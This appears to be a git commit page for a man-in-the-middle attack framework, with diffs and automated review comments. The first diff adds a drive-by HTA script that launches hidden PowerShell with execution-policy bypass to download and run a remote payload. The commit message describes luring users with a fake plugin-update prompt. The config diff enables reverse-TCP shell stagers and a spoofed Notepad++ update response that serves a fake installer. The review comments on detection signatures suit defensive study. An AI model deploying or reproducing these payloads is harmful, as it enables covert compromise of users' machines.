This is a vewwwy big commit

- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as opposed to using regexes
- The logging of the whole framework has been completely overhauled
- plugindetect.js now includes os.js from the metasploit framework for os and browser detection, lets us fingerprint hosts even if UA is lying!
- New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload
- the API of the plugins has been simplified
- Improvements and error handling to user-agent parsing
- Some misc bugfixes
byt3bl33d3r 2015-07-18 20:14:07 +02:00
commit 5e2f30fb89
64 changed files with 3748 additions and 1473 deletions


@ -0,0 +1,4 @@
<script>
var c = "powershell.exe -w hidden -nop -ep bypass -c \"\"IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:3000/ps/ps.png')); Invoke-ps\"\"";
new ActiveXObject('WScript.Shell').Run(c);
</script>
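Review bot: The `var c` line hard-codes `http://0.0.0.0:3000/ps/ps.png`, and nothing in the file says whether that host and port are a placeholder to be edited by hand or a value the plugin rewrites when it serves the file; the plugin code is not visible on this page, so a reader cannot tell. A one-line comment at the top would settle it, for example `<!-- URL host/port below is a placeholder; see the HTA Drive-by plugin for how it is set -->`. For anyone keeping this file as a detection sample, the behaviour it records is a script host starting `powershell.exe` with `-w hidden -nop -ep bypass` and passing a `downloadstring` result to `IEX`, which process-creation logging and PowerShell script-block logging both capture.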


@ -25,7 +25,7 @@
#
port = 445
type = normal # Can be set to Normal or Karma
mode = normal # Can be set to Normal or Karma
# Set a custom challenge
Challenge = 1122334455667788
@ -57,14 +57,13 @@
# ini = /tmp/desktop.ini
# bat = /tmp/evil.bat
#This is still experimental, don't uncomment pls!
#[[HTTP]]
[[HTTP]]
#
# Here you can configure MITMf's internal HTTP server
#
#port = 80
port = 80
#[[[Paths]]]
@ -477,7 +476,7 @@
# PATCH_METHOD overwrites PATCH_TYPE with jump
# PATCH_METHOD = automatic
PATCH_METHOD =
HOST = 192.168.1.16
HOST = 192.168.10.11
PORT = 8443
SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None
@ -511,3 +510,10 @@
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[EvilGrade]
[[NotePad++]]
host = 'notepad-plus-plus.org'
url = '/update/getDownloadUrl.php?version='
data = r'<GUP><NeedToBeUpdated>yes</NeedToBeUpdated><Version>%RAND%</Version><Location>http://notepad-plus-plus.org/repository/%RAND%/%RAND%/npp.%RAND%.Installer.exe</Location></GUP>'
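Review bot: The comment `#This is still experimental, don't uncomment pls!` now contradicts the lines under it in the second hunk, where `[[HTTP]]` and `port = 80` are uncommented; this assumes the comment is kept, since the +/- markers are lost on this page. Either delete it or reword it to say what is still experimental, e.g. `# Experimental: internal HTTP server, enabled by default`. In the third hunk `HOST` appears to move from one developer-specific private address to another; a clearly labelled placeholder with a comment above it would keep a personal lab value out of the shipped default. In the first hunk the key rename from `type` to `mode` means an existing user config that still sets `type` is ignored unless the reader falls back to the old key, which cannot be checked from here.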